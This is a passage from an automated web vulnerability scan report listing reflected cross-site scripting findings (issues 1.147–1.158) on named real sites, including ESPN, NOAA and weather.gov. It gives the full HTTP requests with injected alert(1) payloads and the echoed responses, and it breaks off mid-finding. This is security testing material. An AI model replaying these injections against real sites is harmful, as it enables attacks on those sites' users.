GET /bloomfield-nm/shopping/musical-instruments/x229a6de"-alert(1)-"b1c598501c5 HTTP/1.1
Host: qa.wimgo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 26 Feb 2011 02:19:09 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.3.3 ZendServer/5.0
Set-Cookie: PHPSESSID=ka25urdt89ool7794ausasb6r5; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: _g=anZ6dGJcaGd2eVxUcmI%3D%3AcGJoYWdlbFBicXI9SEYmcGJoYWdlbEFuenI9SGF2Z3JxK0ZnbmdyZiZlcnR2YmE9R0smcHZnbD1Rbnl5bmYmY2JmZ255UGJxcj03NTIwNyZ5bmd2Z2hxcj0zMi43ODI1JnliYXR2Z2hxcj0tOTYuODIwNyZuZXJuUGJxcj0yMTQmcXpuUGJxcj02MjMmcGJoYWdlbFBicXIzPUhGTiZtdmM9NzUyMDcmZmduZ3I9R0s%3D; expires=Sat, 26-Feb-2011 03:19:09 GMT; path=/; domain=qa.wimgo.com
Set-Cookie: _cc=SnZ6dGJfWmJxcnlfWWJwbnlfUHZnbA%3D%3D%3ANjQyOA%3D%3D; expires=Sat, 26-Feb-2011 03:19:09 GMT; path=/; domain=qa.wimgo.com
Set-Cookie: _c=2483; expires=Sat, 26-Feb-2011 03:19:09 GMT; path=/; domain=qa.wimgo.com
Set-Cookie: _cc=SnZ6dGJfWmJxcnlfWWJwbnlfUHZnbA%3D%3D%3AMjQ4Mw%3D%3D; expires=Sat, 26-Feb-2011 03:19:09 GMT; path=/; domain=qa.wimgo.com
Set-Cookie: _g=anZ6dGJcaGd2eVxUcmI%3D%3AeW5ndmdocXI9MzYuNzEwNzIyJnliYXR2Z2hxcj0tMTA3Ljk4MjY2OCZwdmdsPU95YmJ6c3ZyeXEmZmduZ3I9QVo%3D; expires=Sat, 26-Feb-2011 03:19:09 GMT; path=/; domain=qa.wimgo.com
Set-Cookie: _r=10; expires=Sat, 26-Feb-2011 03:19:09 GMT; path=/; domain=qa.wimgo.com
Set-Cookie: _r=10; expires=Sat, 26-Feb-2011 03:19:09 GMT; path=/; domain=qa.wimgo.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 56165

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Frameset//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-frameset.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/sch
...[SNIP]...
);
});
$( "#slider" ).bind( "slidechange", function(event, ui) {
setRadius( $(this).slider( "option", "value" ) );
radiusUrl = "/bloomfield-nm/shopping/musical-instruments/x229a6de"-alert(1)-"b1c598501c5?radius=RADIUS";
radiusUrl = radiusUrl.replace( 'RADIUS', $(this).slider( "option", "value" ) );
window.location = radiusUrl;
});
$( "select.f-left" ).change(function () {

...[SNIP]...

1.147. http://qa.wimgo.com/bloomfield-nm/shopping/musical-instruments/x22 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://qa.wimgo.com
Path:   /bloomfield-nm/shopping/musical-instruments/x22

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 92fce"><script>alert(1)</script>de7cf7e6ed3 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /bloomfield-nm/shopping/musical-instruments/x2292fce"><script>alert(1)</script>de7cf7e6ed3 HTTP/1.1
Host: qa.wimgo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 26 Feb 2011 02:18:58 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.3.3 ZendServer/5.0
Set-Cookie: PHPSESSID=fqj5h9h5515ffsn856fdnqpui5; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: _g=anZ6dGJcaGd2eVxUcmI%3D%3AcGJoYWdlbFBicXI9SEYmcGJoYWdlbEFuenI9SGF2Z3JxK0ZnbmdyZiZlcnR2YmE9R0smcHZnbD1Rbnl5bmYmY2JmZ255UGJxcj03NTIwNyZ5bmd2Z2hxcj0zMi43ODI1JnliYXR2Z2hxcj0tOTYuODIwNyZuZXJuUGJxcj0yMTQmcXpuUGJxcj02MjMmcGJoYWdlbFBicXIzPUhGTiZtdmM9NzUyMDcmZmduZ3I9R0s%3D; expires=Sat, 26-Feb-2011 03:18:58 GMT; path=/; domain=qa.wimgo.com
Set-Cookie: _cc=SnZ6dGJfWmJxcnlfWWJwbnlfUHZnbA%3D%3D%3ANjQyOA%3D%3D; expires=Sat, 26-Feb-2011 03:18:58 GMT; path=/; domain=qa.wimgo.com
Set-Cookie: _c=2483; expires=Sat, 26-Feb-2011 03:18:58 GMT; path=/; domain=qa.wimgo.com
Set-Cookie: _cc=SnZ6dGJfWmJxcnlfWWJwbnlfUHZnbA%3D%3D%3AMjQ4Mw%3D%3D; expires=Sat, 26-Feb-2011 03:18:58 GMT; path=/; domain=qa.wimgo.com
Set-Cookie: _g=anZ6dGJcaGd2eVxUcmI%3D%3AeW5ndmdocXI9MzYuNzEwNzIyJnliYXR2Z2hxcj0tMTA3Ljk4MjY2OCZwdmdsPU95YmJ6c3ZyeXEmZmduZ3I9QVo%3D; expires=Sat, 26-Feb-2011 03:18:58 GMT; path=/; domain=qa.wimgo.com
Set-Cookie: _r=10; expires=Sat, 26-Feb-2011 03:18:58 GMT; path=/; domain=qa.wimgo.com
Set-Cookie: _r=10; expires=Sat, 26-Feb-2011 03:18:58 GMT; path=/; domain=qa.wimgo.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 56582

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Frameset//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-frameset.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/sch
...[SNIP]...
<a rel="nofollow" href="/bloomfield-nm/shopping/musical-instruments/x2292fce"><script>alert(1)</script>de7cf7e6ed3?navs=39%2C394%2C135%2C80%2C832%2C618%2C0%2C0&nv1=Attractions">
...[SNIP]...

1.148. http://qa.wimgo.com/bloomfield-nm/shopping/musical-instruments/x22 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://qa.wimgo.com
Path:   /bloomfield-nm/shopping/musical-instruments/x22

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload aa2f6"-alert(1)-"347f33fe799 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bloomfield-nm/shopping/musical-instruments/x22?aa2f6"-alert(1)-"347f33fe799=1 HTTP/1.1
Host: qa.wimgo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 26 Feb 2011 02:16:51 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.3.3 ZendServer/5.0
Set-Cookie: PHPSESSID=732g8mos0bpq6idorsb2stopq5; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: _g=anZ6dGJcaGd2eVxUcmI%3D%3AcGJoYWdlbFBicXI9SEYmcGJoYWdlbEFuenI9SGF2Z3JxK0ZnbmdyZiZlcnR2YmE9R0smcHZnbD1Rbnl5bmYmY2JmZ255UGJxcj03NTIwNyZ5bmd2Z2hxcj0zMi43ODI1JnliYXR2Z2hxcj0tOTYuODIwNyZuZXJuUGJxcj0yMTQmcXpuUGJxcj02MjMmcGJoYWdlbFBicXIzPUhGTiZtdmM9NzUyMDcmZmduZ3I9R0s%3D; expires=Sat, 26-Feb-2011 03:16:51 GMT; path=/; domain=qa.wimgo.com
Set-Cookie: _cc=SnZ6dGJfWmJxcnlfWWJwbnlfUHZnbA%3D%3D%3ANjQyOA%3D%3D; expires=Sat, 26-Feb-2011 03:16:51 GMT; path=/; domain=qa.wimgo.com
Set-Cookie: _c=2483; expires=Sat, 26-Feb-2011 03:16:51 GMT; path=/; domain=qa.wimgo.com
Set-Cookie: _cc=SnZ6dGJfWmJxcnlfWWJwbnlfUHZnbA%3D%3D%3AMjQ4Mw%3D%3D; expires=Sat, 26-Feb-2011 03:16:51 GMT; path=/; domain=qa.wimgo.com
Set-Cookie: _g=anZ6dGJcaGd2eVxUcmI%3D%3AeW5ndmdocXI9MzYuNzEwNzIyJnliYXR2Z2hxcj0tMTA3Ljk4MjY2OCZwdmdsPU95YmJ6c3ZyeXEmZmduZ3I9QVo%3D; expires=Sat, 26-Feb-2011 03:16:51 GMT; path=/; domain=qa.wimgo.com
Set-Cookie: _r=10; expires=Sat, 26-Feb-2011 03:16:51 GMT; path=/; domain=qa.wimgo.com
Set-Cookie: _r=10; expires=Sat, 26-Feb-2011 03:16:52 GMT; path=/; domain=qa.wimgo.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 56249

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Frameset//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-frameset.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/sch
...[SNIP]...
;
});
$( "#slider" ).bind( "slidechange", function(event, ui) {
setRadius( $(this).slider( "option", "value" ) );
radiusUrl = "/bloomfield-nm/shopping/musical-instruments/x22?aa2f6"-alert(1)-"347f33fe799=1&radius=RADIUS";
radiusUrl = radiusUrl.replace( 'RADIUS', $(this).slider( "option", "value" ) );
window.location = radiusUrl;
});
$( "select.f-left" ).change(function () {

...[SNIP]...

1.149. http://qa.wimgo.com/bloomfield-nm/shopping/musical-instruments/x22 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://qa.wimgo.com
Path:   /bloomfield-nm/shopping/musical-instruments/x22

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 145d2"><script>alert(1)</script>dfc358508db was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /bloomfield-nm/shopping/musical-instruments/x22?145d2"><script>alert(1)</script>dfc358508db=1 HTTP/1.1
Host: qa.wimgo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 26 Feb 2011 02:16:36 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.3.3 ZendServer/5.0
Set-Cookie: PHPSESSID=kplke0fp6227hhtnkrqq4j5p27; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: _g=anZ6dGJcaGd2eVxUcmI%3D%3AcGJoYWdlbFBicXI9SEYmcGJoYWdlbEFuenI9SGF2Z3JxK0ZnbmdyZiZlcnR2YmE9R0smcHZnbD1Rbnl5bmYmY2JmZ255UGJxcj03NTIwNyZ5bmd2Z2hxcj0zMi43ODI1JnliYXR2Z2hxcj0tOTYuODIwNyZuZXJuUGJxcj0yMTQmcXpuUGJxcj02MjMmcGJoYWdlbFBicXIzPUhGTiZtdmM9NzUyMDcmZmduZ3I9R0s%3D; expires=Sat, 26-Feb-2011 03:16:36 GMT; path=/; domain=qa.wimgo.com
Set-Cookie: _cc=SnZ6dGJfWmJxcnlfWWJwbnlfUHZnbA%3D%3D%3ANjQyOA%3D%3D; expires=Sat, 26-Feb-2011 03:16:36 GMT; path=/; domain=qa.wimgo.com
Set-Cookie: _c=2483; expires=Sat, 26-Feb-2011 03:16:36 GMT; path=/; domain=qa.wimgo.com
Set-Cookie: _cc=SnZ6dGJfWmJxcnlfWWJwbnlfUHZnbA%3D%3D%3AMjQ4Mw%3D%3D; expires=Sat, 26-Feb-2011 03:16:36 GMT; path=/; domain=qa.wimgo.com
Set-Cookie: _g=anZ6dGJcaGd2eVxUcmI%3D%3AeW5ndmdocXI9MzYuNzEwNzIyJnliYXR2Z2hxcj0tMTA3Ljk4MjY2OCZwdmdsPU95YmJ6c3ZyeXEmZmduZ3I9QVo%3D; expires=Sat, 26-Feb-2011 03:16:36 GMT; path=/; domain=qa.wimgo.com
Set-Cookie: _r=10; expires=Sat, 26-Feb-2011 03:16:36 GMT; path=/; domain=qa.wimgo.com
Set-Cookie: _r=10; expires=Sat, 26-Feb-2011 03:16:36 GMT; path=/; domain=qa.wimgo.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 56723

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Frameset//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-frameset.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/sch
...[SNIP]...
<a rel="nofollow" href="/bloomfield-nm/shopping/musical-instruments/x22?145d2"><script>alert(1)</script>dfc358508db=1&navs=39%2C394%2C135%2C80%2C832%2C618%2C0%2C0&nv1=Attractions">
...[SNIP]...

1.150. https://r.espn.go.com/members/util/getUserInfo [cb parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://r.espn.go.com
Path:   /members/util/getUserInfo

Issue detail

The value of the cb request parameter is copied into the HTML document as plain text between tags. The payload e042f<script>alert(1)</script>2f8618a1586 was submitted in the cb parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /members/util/getUserInfo?cb=runOmnitureIndependentlye042f<script>alert(1)</script>2f8618a1586 HTTP/1.1
Host: r.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Content-Length: 108
Content-Type: text/html; charset=iso-8859-1
Server: barista/3.3.6
p3p: CP=CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE

runOmnitureIndependentlye042f<script>alert(1)</script>2f8618a1586(null, null, null, null, null, null, null);

1.151. http://radar.weather.gov/radar_lite.php [loop parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://radar.weather.gov
Path:   /radar_lite.php

Issue detail

The value of the loop request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bbf71"%20a%3db%20e62e3e0d62b was submitted in the loop parameter. This input was echoed as bbf71" a=b e62e3e0d62b in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /radar_lite.php?product=N0R&rid=GYX&loop=nobbf71"%20a%3db%20e62e3e0d62b HTTP/1.1
Host: radar.weather.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Age: 0
Date: Sat, 26 Feb 2011 02:18:31 GMT
Content-Length: 14076
Content-Type: text/html; charset=UTF-8
Expires: Sat, 26 Feb 2011 02:28:31 GMT
Cache-Control: max-age=600
Server: Apache
Via: 1.1 hyacinth (NetCache NetApp/6.0.3), 1.0 c3.w3.woc (squid)
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html lang="en"><head>
<title>National Weather Service radar from Portland, ME</title>
<meta nam
...[SNIP]...
<a class="navbar" href="radar.php?rid=gyx&overlays=11101111&product=N0R&loop=nobbf71" a=b e62e3e0d62b" title="Go to the Enhanced Version">
...[SNIP]...

1.152. http://radar.weather.gov/radar_lite.php [product parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://radar.weather.gov
Path:   /radar_lite.php

Issue detail

The value of the product request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3b52b"%20a%3db%20b5abd972cb4 was submitted in the product parameter. This input was echoed as 3b52b\" a=b b5abd972cb4 in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /radar_lite.php?product=N0R3b52b"%20a%3db%20b5abd972cb4&rid=GYX&loop=no HTTP/1.1
Host: radar.weather.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Age: 0
X-Cache-TTL: 172800
Date: Sat, 26 Feb 2011 02:15:01 GMT
Content-Length: 14089
Content-Type: text/html; charset=iso-8859-1
Expires: Mon, 28 Feb 2011 02:15:01 GMT
Cache-Control: max-age=172800
Server: Apache
Vary: Accept-Encoding
X-Cached-Time: Sat, 26 Feb 2011 02:15:01 GMT
Via: 1.1 nws-hq-cache03 (NetCache NetApp/6.0.7), 1.0 c3.w3.woc (squid)
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html lang="en"><head>
<title>National Weather Service radar from Portland, ME</title>
<meta nam
...[SNIP]...
<a class="navbar" href="radar.php?rid=gyx&overlays=11101111&product=N0R3b52b\" a=b b5abd972cb4&loop=no" title="Go to the Enhanced Version">
...[SNIP]...

1.153. http://recreationalequipmen.tt.omtrdc.net/m2/recreationalequipmen/mbox/standard [mbox parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://recreationalequipmen.tt.omtrdc.net
Path:   /m2/recreationalequipmen/mbox/standard

Issue detail

The value of the mbox request parameter is copied into the HTML document as plain text between tags. The payload a34c8<script>alert(1)</script>edbd78759d0 was submitted in the mbox parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /m2/recreationalequipmen/mbox/standard?mboxHost=www.rei.com&mboxSession=1298667914619-871377&mboxPC=1298667914619-871377.17&mboxPage=1298667927682-403800&screenHeight=1200&screenWidth=1920&browserWidth=1437&browserHeight=954&browserTimeOffset=-360&colorDepth=16&mboxCount=1&mbox=recs_hpCustPicksa34c8<script>alert(1)</script>edbd78759d0&mboxId=0&mboxTime=1298646327740&mboxURL=http%3A%2F%2Fwww.rei.com%2F&mboxReferrer=&mboxVersion=39 HTTP/1.1
Host: recreationalequipmen.tt.omtrdc.net
Proxy-Connection: keep-alive
Referer: http://www.rei.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Content-Length: 212
Date: Fri, 25 Feb 2011 21:06:33 GMT
Server: Test & Target

mboxFactories.get('default').get('recs_hpCustPicksa34c8<script>alert(1)</script>edbd78759d0',0).setOffer(new mboxOfferDefault()).loaded();mboxFactories.get('default').getPCId().forceId("1298667914619-871377.17");

1.154. http://recs.richrelevance.com/rrserver/p13n_generated.js [ctp parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://recs.richrelevance.com
Path:   /rrserver/p13n_generated.js

Issue detail

The value of the ctp request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2c3c1'%3balert(1)//3dbbc323ad9 was submitted in the ctp parameter. This input was echoed as 2c3c1';alert(1)//3dbbc323ad9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /rrserver/p13n_generated.js?a=5387d7af823640a7&ts=1298696265845&cis=%7C72384&p=1a6ddbd&re=True&cts=http%3A%2F%2Fwww5.jcpenney.com%2Fjcp%2F&pt=%7Censemble_page.content1&s=60f3720e7c71e45edb02b68f7b004135cxMnVNoVza3oxMnVNoVza3W200B181A7FD6BCDF0818AD551CB2274291EC1105704&ctp=%7C0%3AcmOrigId%25253D1a6ddbd%252526cmTypeFlag%25253DRichRel%252526cmCatID%25253Dhomepage%25257C723842c3c1'%3balert(1)//3dbbc323ad9&pref=http%3A%2F%2Fwww4.jcpenney.com%2Fjcp%2FXGN.aspx%3Fn%3D4294953363%26catsel%3D4294953363--comforters%2B%2B%2Bbedspreads%26deptid%3D70750%26pcatid%3D70750%26catid%3D72384%26cattyp%3DSAL%26dep%3DBEDDING%26pcat%3DBEDDING%26cat%3DSale%26refpagename%3DDefault%25252Easpx%26refdeptid%3D%26refcatid%3D%26cmAMS_T%3DT1%26cmAMS_C%3DC3%26CmCatId%3Dhomepage&l=1 HTTP/1.1
Host: recs.richrelevance.com
Proxy-Connection: keep-alive
Referer: http://www5.jcpenney.com/jcp/X6E.aspx?GrpTyp=ENS&ItemID=1a6ddbd&deptid=70750&dep=BEDDING&catid=72384&pcat=BEDDING&cat=Sale&NOffset=0&CatSel=4294953363%7ccomforters+%2b+bedspreads&pcatid=70750&Ne=4294957900+5+877+1014+1031+1007+6+8+904+18+833&N=4294953363&SO=0&cattyp=SAL&Nao=0&PSO=0&CmCatId=homepage|72384
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uc=8f0d715c-e29a-4f38-9373-184b98130248

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Sat, 26 Feb 2011 05:00:30 GMT
Content-Type: application/x-javascript;charset=UTF-8
Connection: keep-alive
P3p: policyref="http://recs.richrelevance.com/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR"
Set-Cookie: vihc=b126.1298696430236.43015778%7C; Path=/
Set-Cookie: pvihc=b126.1298696430236.43015778%7C; Expires=Tue, 23-Feb-2021 05:00:30 GMT; Path=/
Vary: Accept-Encoding
Content-Length: 13433

var rr_recs={placements:[{used:false,placementType:'ensemble_page.content1',html:'<div class="rrOuterBox"> <div class="rrStrategyMessage" style="zoom: 1">Customers who viewed 400TC WrinkleGuard Bed
...[SNIP]...
818AD551CB2274291EC1105704&pg=615&p=1649c84&ct=http%3A%2F%2Fwww5.jcpenney.com%2Fjcp%2FX6E.aspx%3FGrptyp%3DENS%26ItemId%3D1649c84%26cmOrigId%3D1a6ddbd%26cmTypeFlag%3DRichRel%26cmCatID%3Dhomepage%7C723842c3c1';alert(1)//3dbbc323ad9\'">
...[SNIP]...

1.155. http://response.restoration.noaa.gov/orr_search.php [message parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://response.restoration.noaa.gov
Path:   /orr_search.php

Issue detail

The value of the message request parameter is copied into the HTML document as plain text between tags. The payload 702bd<script>alert(1)</script>df4883bec6d was submitted in the message parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /orr_search.php?message=The%20page%20you%20requested%20was%20not%20found.%20Please%20use%20our%20search%20page%20to%20find%20what%20you%20were%20looking%20for.702bd<script>alert(1)</script>df4883bec6d HTTP/1.1
Host: response.restoration.noaa.gov
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=7bf40be4e7088c5b50a95bc456b809b0

Response

HTTP/1.1 200 OK
Date: Sat, 26 Feb 2011 13:46:32 GMT
Server: Apache
X-Powered-By: PHP/5.2.6-1+lenny9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 16536

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html lang="en">

   <head>
       <meta http-equiv="content-type" content="text/html;charset=ISO-8859-1">
       <meta name="generator" cont
...[SNIP]...
<strong>The page you requested was not found. Please use our search page to find what you were looking for.702bd<script>alert(1)</script>df4883bec6d</strong>
...[SNIP]...

1.156. http://response.restoration.noaa.gov/orr_search.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://response.restoration.noaa.gov
Path:   /orr_search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 3c06b<script>alert(1)</script>96a6c1f2475 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /orr_search.php?message=The%20page%20you%20requested%20was%20not%20found.%20Please%20use%20our%20search%20page%20to%20find%20what%20you%20were%20looking%20/3c06b<script>alert(1)</script>96a6c1f2475for. HTTP/1.1
Host: response.restoration.noaa.gov
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=7bf40be4e7088c5b50a95bc456b809b0

Response

HTTP/1.1 200 OK
Date: Sat, 26 Feb 2011 13:46:52 GMT
Server: Apache
X-Powered-By: PHP/5.2.6-1+lenny9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 16546

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html lang="en">

   <head>
       <meta http-equiv="content-type" content="text/html;charset=ISO-8859-1">
       <meta name="generator" cont
...[SNIP]...
<strong>The page you requested was not found. Please use our search page to find what you were looking /3c06b<script>alert(1)</script>96a6c1f2475for.</strong>
...[SNIP]...

1.157. http://rtb0.doubleverify.com/rtb.ashx/verifyc [callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://rtb0.doubleverify.com
Path:   /rtb.ashx/verifyc

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 5975d<script>alert(1)</script>8e27cf83e0e was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /rtb.ashx/verifyc?ctx=741233&cmp=5027088&plc=56548503&sid=953349&num=1&ver=4&dv_url=http%3A//www.komonews.com/&callback=__verify_callback_2587954816405975d<script>alert(1)</script>8e27cf83e0e HTTP/1.1
Host: rtb0.doubleverify.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Connection: close
Content-Type: text/javascript; charset=utf-8
Server: Microsoft-IIS/7.0
Date: Wed, 23 Feb 2011 21:37:10 GMT
Content-Length: 74

__verify_callback_2587954816405975d<script>alert(1)</script>8e27cf83e0e(2)

1.158. http://search.4shared.com/css/common.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://search.4shared.com
Path:   /css/common.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 81082"-alert(1)-"fa1a66483cf was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

